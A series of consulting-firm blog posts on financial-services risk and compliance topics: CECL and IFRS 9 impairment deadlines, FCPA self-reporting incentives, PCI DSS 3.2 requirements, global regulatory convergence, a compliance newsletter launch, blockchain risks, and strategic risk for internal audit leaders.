CECL/IFRS 9 Update: New Credit Impairment Model Deadlines and Implementation Considerations



Charles Soranno - MD New Jerseyby Charlie Anderson, Managing Director, Model Risk Management


Charles Soranno, Managing Director, Financial Reporting Remediation & Compliance

As Protiviti reported back in May, the Financial Accounting Standards Board (FASB) and the International Accounting Standards Board (IASB) have been looking for lessons in the global banking crisis of 2007-08 and have come up with new forward-looking predictive models for financial institutions to use when estimating how much to reserve against potential loan losses.

The FASB’s CECL model will become effective in 2020, with the IASB’s International Financial Reporting Standard 9 (IFRS 9) standard beginning that year if early adoption is not elected. Protiviti strongly recommends immediate action because of the extensive changes in data-collection practices, systems configuration, loan classification and risk modeling required by the change.

The new impairment model from FASB, which applies to banks, savings and loans, credit unions, and non-bank lenders in the United States, and global institutions traded on U.S. exchanges, is called Current Expected Credit Loss (CECL). Final guidance on the model was issued on June 16, 2016. The new impairment model from IASB, which applies to institutions based outside the United States, is a part of IFRS.

For a detailed analysis of these new methodologies, see Protiviti’s Point of View briefing, Impact of the New Current Expected Credit Loss (CECL) Methodology, and the companion paper, IFRS 9 Impairment — Practical Implications. Both models are discussed, along with implementation considerations, in our Aug. 17 webinar, “Impact and Challenges of CECL and IFRS,” available in our online webinar archive.

The methodologies are similar in that they both replace traditional reserve requirements based on historical losses with new predictive models incorporating past, present and future data, as well as market intelligence and macroeconomic trends. The primary difference is that IFRS 9 uses a three-stage loan classification model not included in CECL.

The basics of these two methodologies have been covered in our previous blog post, so we don’t want to rehash them here, but we do want to share some implementation considerations we discussed in the webinar. Successful implementation is going to require an enterprisewide effort with input from most, if not all, departments. Some of the bigger details to be worked out include:

  • Gathering required data assets/history to feed the new model requirements
  • Creating underlying models and IT infrastructure for determining the required reserves
  • Identifying required business process updates, along with resources required to validate the updated reserving methodologies

Specific deadlines for CECL include:

  • SEC filing institutions effective for years beginning after Dec. 15, 2019
  • Non-SEC filing public business entities effective for years beginning after Dec. 15, 2020
  • All other entities, plus nonprofit organizations, effective for fiscal years beginning after Dec. 15, 2020, and interim periods with fiscal years beginning Dec. 15, 2021

IFRS 9 is effective for all entities for annual periods beginning on or after Jan. 1, 2018, but firms may choose to adopt the standard early.

Protiviti is already working closely with clients to help them prepare, and we encourage all financial institutions to act without delay. We fully expect practical issues and questions to be raised during the implementation and auditing phases, and further evolution of the guidance is quite likely. Financial service organizations need to start assessing the implications of these approaches sooner rather than later.

Thank you to Protiviti Associate Director Benjamin Shiu for his contributions to our CECL and IFRS 9 materials as well as our webinar.

FCPA and the DoJ: Compliance Beats Defiance

Scott Moritz - Protiviti NY 2013 (hi res)By Scott Moritz
Managing Director, Protiviti Forensic

I’ve written before about how the Department of Justice (DoJ) is stepping up efforts to root out and prosecute corporate fraud, particularly bribery and corruption, under the Foreign Corrupt Practices Act (FCPA). One of the biggest complaints I’ve heard from clients and their counsel is that there are varying degrees of credit and reduced fines and disgorgements granted for companies that self-report and that some have found it difficult to calculate the potential benefits of self-reporting.

The DoJ recognizes this perceived disparity and in April launched a pilot program to encourage corporate compliance through an incentive program offering up to 50 percent off of fines and minimum sentencing guidelines for companies that self-report FCPA violations, cooperate with investigators and take measures to prevent future fraud.

In May, Protiviti held its first FCPA and Anti-Kleptocracy Conference, bringing corporate executives and compliance officers together with government corruption investigators in a neutral environment to share ideas and build constructive alliances. It was a lively exchange. I came away with a lot to think about, and I’ll be sharing some of it here on The Protiviti View, beginning with this post on compliance considerations.

Last year, the Department of Justice signaled an increased focus on corporate crime and international corruption with the creation, in March, of three dedicated FCPA squads, and a subsequent memo from Deputy Attorney General Sally Quillian Yates to DoJ attorneys on the importance of holding individuals accountable in corporate prosecutions.

At the same time, to encourage corporate cooperation and transparency, the DoJ began touting incentives, such as reduced penalties, for executives and corporations that demonstrate good faith in the investigation and a proactive stance toward prevention going forward. The recently announced pilot program is a good example of that. With so much to gain from cooperation and so much to lose, compliance has never been more important.

One of the speakers at the FCPA conference was Laura Perkins, an assistant chief in the DoJ’s FCPA unit, where she supervises and prosecutes FCPA cases against individuals and companies. According to Perkins, one of the first things the DoJ looks at, upon responding to an incident, is the quality of a company’s compliance program and controls. They initiate discussions with the company and quickly begin to form opinions about how transparent and cooperative the organization is going to be in the investigation.

The DoJ will ask about compliance programs prior to the incident, efforts to find root causes, discipline of responsible parties and actions taken post-incident to prevent future corruption.

Perkins mentioned that one of the more significant changes within the DoJ is its retention of a compliance counsel – someone who attends compliance meetings at target companies to get an inside picture, as well as helps some of the trial attorneys who don’t have as much exposure to compliance and controls and what they should look like.

When it comes to discipline, the DoJ isn’t as concerned with outright dismissal as it is with ensuring that the punishment fits the crime.  With minor infractions, training is often sufficient. The important thing here, from a compliance perspective, is being able to document and demonstrate the controls and practices in place to ensure FCPA compliance, the mechanisms in place to detect violations, and the rigor and sincerity of corrective efforts to prevent future violations.

From my perspective here at Protiviti, I would add that the best compliance programs are those based on real-world examples. There is much that can be learned from the mistakes of others and from the open exchange of ideas – which was one of the primary motivations for our FCPA conference.

Finally, I would note that a strong anti-corruption culture discourages corrupt parties from targeting your organization in the first place. Here’s what such a culture looks like, according to the DoJ:

  • Sufficient compliance-dedicated resources;
  • Competent compliance personnel who are sufficiently compensated and promoted;
  • Compliance function independence and reporting structure;
  • Compliance program crafted from an effective risk assessment; and
  • Compliance program audited regularly to assess its effectiveness.

In future posts, I’ll examine the DoJ’s pilot program in greater detail, discuss ways to avoid FCPA successor liability through acquisitions and contracts with third parties, and address some other topics discussed during our FCPA and Anti-Kleptocracy Conference.

PCI DSS 3.2 – What You Need to Know

Jeff SanchezScott Laliberte

By Jeff Sanchez, Managing Director, IT Security and Privacy


Scott Laliberte, Managing Director, IT Consulting

We’ve been getting a lot of inquiries from clients on the new payment card industry (PCI) compliance standard issued by the PCI Security Standards Council in April. The new data security standards (DSS) release, dubbed PCI DSS Version 3.2, contains some major changes from the previous version.

The changes are explained pretty clearly in our May 9 Flash Report, but we recently had the opportunity for a more interactive discussion and to answer questions via a webinar we held on August 18. In a future post, we will follow up with some of the questions we did not have a chance to address. Here, we’d like to focus on the upcoming changes.

Some of the upcoming changes may require a significant effort to achieve. This affects all entities transacting business by credit, debit or cash cards and could result in many organizations being out of compliance for an extended period of time.

The biggest changes affecting all organizations (effective Feb. 1, 2018) are as follows:

  • Multifactor authentication will be required for administrative access to any system within, or connected to, the cardholder data environment (CDE), even when connecting from within the corporate network. That means that, in addition to a password, anyone seeking to access the system must present some other form of identification, such as a fingerprint or optical scan. This requirement already applies to users, administrators and third parties accessing the system remotely. Note: Companies currently using multifactor authentication as a compensating control for technical noncompliance will no longer be able to list this as a compensating control after it becomes a requirement.
  • File integrity monitoring (FIM), or some kind of change-detection solution, will be required for all in-scope systems, which includes all systems connected to – not just those within – the CDE. Many organizations do not currently have FIM technology on point-of-sale terminals or administrative workstations.
  • Change management is an area of increasing concern for the Security Standards Council. PCI 3.2 requires organizations to carefully document all changes to in-scope systems, plus any controls that might be affected by each change, and prove that the controls have been tested post-implementation and that corrective action was taken, if needed, to restore an effective control environment.

Service providers face even greater scrutiny under the new standards.

  • Security controls monitoring needs to be able to detect failures, and the provider must have supporting processes that document how to fix control failures, as well as processes for documentation, determining root causes and getting security systems back into operation.
  • Executive management responsibility is another hot-button issue. PCI 3.2 requires service providers to assign a member of executive management to be responsible for protecting the CDE. This executive will oversee testing and sign an attestation of compliance.
  • Operational reviews must be conducted quarterly. Service providers are required to perform quarterly reviews of operational processes, including, but not limited to, daily logs, firewall rules, configuration standards, security alerts and change management procedures.
  • Penetration testing on segmentation controls will have to be conducted at least every six months under PCI 3.2, versus annually in 3.1. The scope of penetration testing needs to be coordinated to ensure that the CDE remains secure, even in the event of a total administrative takeover of a segmented system.
  • Service providers are also now required to provide auditors with a documented description of cryptographic architecture used in the CDE. This must include all algorithms, protocols and keys used for the protection of cardholder data, including key strength and expiration date.

PCI version 3.2 is available for use now and becomes the only valid standard when version 3.1 is retired on Oct. 31, 2016. However, many of the new requirements in 3.2 do not become effective until Feb. 1, 2018. As we said in the webinar, we strongly recommend that organizations work with a Qualified Security Assessor now to ensure compliance and avoid unpleasant surprises under deadline pressure.

Global CAEs Seeing Regulatory Convergence

Frederick MagliozziFrederick Magliozzi, Managing Director
Internal Audit and Financial Advisory



At The Institute of Internal Auditors International Conference in New York this July, I had the privilege of moderating a panel of CAEs on global audit issues, emerging risks and challenges in the financial services industry.

We had a large international group, including hundreds of CAEs, who were eager to hear from our panelists representing some of the world’s largest financial institutions. Among the panelists were Mark Carawan, CAE of Citi; Naohiro Mouri, Chief Internal Auditor of AIG Japan Holdings; Nicola Rimmer, General Manager Audit at ANZ Bank; and Stephan Schenk, Executive Vice-President and Chief Auditor at TD Bank.

Panelists began with a discussion of the evolving risk landscape. As you might imagine, fraud, reputation and cybersecurity topped the risk list, with cloud risk rising in response to growing demand for mobile banking and big data analytics.

Although those risks are not necessarily new, the conversation focused on ways the internal audit function is evolving to stay ahead of the risk curve. Panelists emphasized the importance of continuous monitoring and the need for audit automation, digitization and more sophisticated tools to support the ascendancy of internal audit into a more strategic role as risk advisor across all lines of defense.

The need for the implementation of new audit technology and ongoing training in how to make the most of these new and sophisticated tools was a recurring theme, echoed in a subsequent question about the future of the internal audit function. Our panelists all emphasized the critical need for internal auditors to be able to anticipate and identify potentially disruptive risks and work closely with first-line managers to bring value-added mitigation recommendations to the table.

For me, the biggest takeaway from the discussion was the consensus among both panelists and CAEs in attendance, that regulators around the globe are beginning to align their efforts particularly in areas such as anti-money-laundering (AML) and the Bank Secrecy Act (BSA).

There seems to be a growing acknowledgement that money knows no borders. Regulators from various geographies around the globe are in much closer communication than ever before. They communicate regularly and they are creating a lot of pressure for financial institutions to make sure they are addressing risks — not only strategic risks, but local regulatory risks. And they are interested in the credentials of the people assigned to watch over these risks, to ensure technical competency.

From an internal audit perspective, this future state of increased regulatory cooperation and scrutiny demands robust risk assessments and risk training, to ensure that stakeholders understand all of the significant risks institutions face. Current regulatory hot buttons include: vendor risk management, AML/BSA, and cybersecurity to name a few.

In closing, I’d emphasize again that when it comes to internal audit, the tendency is toward unification – this includes ability to see the big picture, connect the dots, articulate interdependencies and collaborate. Regulators increasingly practice the same. For a more in-depth analysis of global regulation, I’d recommend our recently published white paper, The Challenges of Running a Global AML Program. Your thoughts and comments are appreciated, as always.

Introducing Compliance Insights: Protiviti’s Monthly Roundup of News for Financial Services Firms

Steven StachowiczBy Steven Stachowicz, Managing Director
Risk and Compliance



With global banking regulation consistently ranking as a top concern for financial service industry executives and directors, Protiviti has launched Compliance Insights, a monthly advisory newsletter designed to provide financial services industry (FSI) executives with timely news on issues that are relevant now.

Although primarily focused on banking compliance matters related to consumer protection, privacy, anti-money laundering/anti-terrorist financing, and sanctions, this short newsletter also includes topics applicable to other types of financial institutions, including those in capital markets and emerging financial technology (“fintech”).

The information we choose for our monthly briefing is not intended to be a complete picture of the FSI compliance landscape, but to provide clear and concise summaries on key topics we consider of interest to the industry.  We’re not going to cover everything; rather, each month we’ll highlight a handful of issues, tapping our subject-matter experts for analyses of the latest changes in rules and guidance.

Our inaugural issue, launched in July, led with a couple of updates on global payment systems.  In the wake of cyberattacks on the Society for Worldwide Interbank Financial Telecommunication (SWIFT) payments network, which facilitates cross-border interbank transfers, both SWIFT and the Federal Financial Institutions Examination Council (FFIEC) issued reminders to institutions of the need to manage risks associated with interbank electronic transactions. We also shared new guidance from the Wolfsberg Group of International Financial Institutions, an association of 13 global banks with a common goal of developing effective anti-money laundering (AML) standards. The guidance is related to financial institutions’ use of certain SWIFT services.

Other topics included:

  • Proposed rules from the SEC limiting the use of derivative investments by mutual funds;
  • The long-anticipated proposal from the Consumer Financial Protection Bureau (CFPB) on rules governing payday, vehicle title, and other short-term, small-dollar loans; and
  • The possibility of fintech firms obtaining limited-purpose national bank charters, enabling them to operate under uniform federal regulation and supervision.

Our August issue, released last week, provides updates on another CFPB proposal, this one focused on third-party debt collection practices, plus several other topics we consider relevant:

  • A joint regulatory update of Community Reinvestment Act (CRA) Q&As
  • Increased regulatory scrutiny of potential money laundering at card clubs, casino-like gambling establishments offering exclusively card games
  • A ruling by a Miami judge in an anti-money laundering case that calls into question whether bitcoins are “money”
  • Upcoming changes to the Military Lending Act (MLA), which extends additional consumer lending protections to active-duty military personnel and their dependents

We hope you’ll find this resource useful – please let us know if you do or if you have any suggestions or suggested topics. It is part of our ongoing effort to help financial service institutions face the future with confidence.

You can subscribe to Compliance Insights or send us your feedback here.

Blockchain Unchained: Bitcoin Was Just the Beginning

EdPage_croppedBy Ed Page, Managing Director
IT Consulting



These days, it seems that everyone in the financial services industry is talking about distributed consensus ledger (DCL) technology, commonly known as blockchain. The real-time transaction and settlement technology is viewed by some as the breakthrough that’s going to revolutionize electronic payments systems, and by others as the technological grenade that’s going to rip a hole in the world of banking systems as we know it. The truth is, nobody knows how things will turn out with any degree of certainty.

In my opinion, blockchain is potentially one of the most disruptive business technologies to emerge in the digital age, replacing the traditional bookkeeping system of single private ledgers kept in siloed databases and updated in daily batch settlements with a chain of shared, encrypted public ledgers, linked and validated by network consensus in real time to enable instantaneous settlement. Transactions are said to be “immutable,” because they are confirmed by the network, and cannot be altered by an individual.

In essence, blockchain serves the same function as the current system of clearinghouses and transaction networks that handle most electronic payments and money transfers, including ATM transactions, correspondent banking, credit card purchases and electronic funds transfers. And that’s just one application. Other uses range from secure document transfer and trading of stocks and bonds, to cybersecurity and internal audit.

As you might imagine with something so fundamentally different from what came before it, expert opinions on the benefits, risks and applications are all over the map and often contradictory. The technology itself fosters such contradictions.

For example, while blockchain transactions are considered to be extremely transparent, the anonymity of those transactions has raised anti-money laundering (AML) and Bank Secrecy Act (BSA) concerns — to use an analogy, while the game itself is transparent, the players are not. And despite the widespread (and accurate) belief that blockchain transactions are secure, hackers recently raided a cryptocurrency exchange, making off with millions of dollars in real cash, from transactions conducted in Bitcoin via blockchain.

I bring up the hacker attack to illustrate that while blockchain does, in fact, protect the integrity of the transaction, open ledger cryptocurrency networks remain vulnerable at the nodes, the various businesses that house customer data.

With closed or permission-based blockchains being viewed increasingly as the future in banking, such obstacles will surely be overcome, but it is important to recognize that we are in a “Wild West” period where hackers and fraudsters are trying as hard to beat the system as others are trying to build it.

Once the “frontier” aspect of blockchain wears out and it begins to find its place into the mainstream of banking technology, financial institutions will need to take other, equally important issues into consideration. Here are a few of the wrinkles that will need to be ironed out:

  • Legacy environment — The old ways may not be elegant, or what everybody wants to use, but they are so embedded in the financial services ecosystem that it will take time and effort to change. Overcoming that inertia and figuring out how to integrate old and new in a 24/7/365 transactional environment is going to be a challenge. Regardless of the time it takes, the writing is on the wall for legacy systems.
  • Vested interests — As a technology that eliminates intermediaries, blockchain has the potential to disrupt the powerful and established institutions that own, and profit from, the movement of money among financial institutions. New business models will inevitably emerge.
  • Regulation — Although transactions are transparent, the ability to track money movement in this environment is still undeveloped. Anti-money laundering (AML) is expensive for banks, and the people who launder money tend to spread their activities across multiple institutions, making tracing those activities in their entirety difficult. Blockchain has the potential to shift regulatory focus and burden away from individual institutions and to the exchange network itself. Businesses are already forming to address that need.

Although it is too early for anyone to have all the answers, financial service executives and internal auditors need to become conversant in blockchain to avoid being blindsided by this rapidly evolving disruptor. For a good primer on blockchain, I’d recommend Volume 3, Issue 2 of Protiviti’s PreView series on emerging risks. We’re going to stay on top of this topic for you. Stay tuned!

Strategic Risks: How Can CAEs Up Their Game?

The latest Common Body of Knowledge (CBOK) survey of internal audit stakeholders reports 7 out of 10 stakeholders want audit leaders to focus on strategic risks, as well as operational, compliance and financial risks, during an audit.

The message is loud and clear. Board members and senior executives are saying they wish to look to the internal audit function for insights that will help them stay ahead of the curve on managing strategic risks — a responsibility that requires collaborations across all lines of defense.

The last thing we, as internal auditors, ever want to hear when something goes wrong is: “Where was internal audit?” But how can CAEs up their game to ensure that this doesn’t happen, particularly when there is increased interest in strategic disruption risk? I recently had the pleasure of addressing this topic joined by an outstanding CAE – Chuck Windeknecht, Vice President of the Internal Audit Department at Atlas Air Worldwide, at The IIA International Conference in New York.

A progressive CAE establishes relevance with the board of directors by understanding the organization’s business objectives, strategy and culture, and identifying risks that could impede the successful execution and achievement of the organization’s strategy and objectives. This baseline understanding positions the organization and the internal audit function to constantly scan the horizon and sift through the noise so the audit committee and executive team can be given strategically relevant insights – something they don’t already know.

To do so, CAEs must be alert, informed, and able to quickly discern the vital signs of change. Success is not a matter of luck, but of preparation that leads to doing four things really well:

  1. Understand the critical assumptions underlying the business model. From an internal audit perspective, this is important to be able to adopt a contrarian view, as well as constantly be on the lookout for changes that could disrupt and threaten the company’s strategic plans and business model. CAEs must be able to access and understand opposing points of view within and outside the organization. But they need a context – and that context would be the organization’s strategic assumptions. That’s not to say auditors shouldn’t remain focused on important operational, compliance and reporting issues. The key is to leverage all available technology and tools to allow themselves more time to think strategically.
  2. Help the organization apply scenario analysis capabilities to evaluate potential situations. As the third line of defense, internal audit is one of the organization’s key components of a comprehensive risk management organization. Accordingly, if internal audit could help identify an event or combination of events that could invalidate one or more of the critical assumptions on a timely basis, it would contribute value to the organization’s leadership. While it is universally accepted that risk assessments must be refreshed periodically, the internal auditor’s line of sight is directed to timely recognition of emerging and changing risks.
  3. Ensure the organization’s intelligence gathering activities are aligned with the key indicators evidencing that scenarios of greatest concern are either developing or have occurred. It is one thing to know what can derail the strategy. It is another to align intelligence gathering with factors that signal when such events or circumstances are occurring or have occurred. Competitive intelligence creates enterprisewide transparency by seeking out forward-looking nontraditional information and data that may offer decision makers a contrarian view and early warning signs. Internal audit is well suited to assist the organization’s efforts with analyzing its early alert capabilities to more effectively mitigate the impact of disruptive developments. The understanding of strategic assumptions and an effective contrarian viewpoint enable this analysis.
  4. Help distill and de-mystify timely information about assumptions, scenario analyses and intelligence gathered. Reporting insights to decision makers is what it’s all about – setting us apart and establishing our relevance. To this end, it is critical to establish direct access to customer and marketplace feedback and provide insights that are unfiltered by the suppression occurring when information passes through traditional information siloes. Internal audit should place an emphasis on improving risk information across the organization. That can lead to better information for decision-making used in the business.

To echo my colleague Brian Christensen, these are exciting times for the internal audit profession. Our strategic advice and insight are being sought like never before. We’ve come a long way to get here. Now that all eyes are on us, it is critically important to perform with skill, intelligence and dedication, to prove that our leaders’ faith and trust in us are well-placed.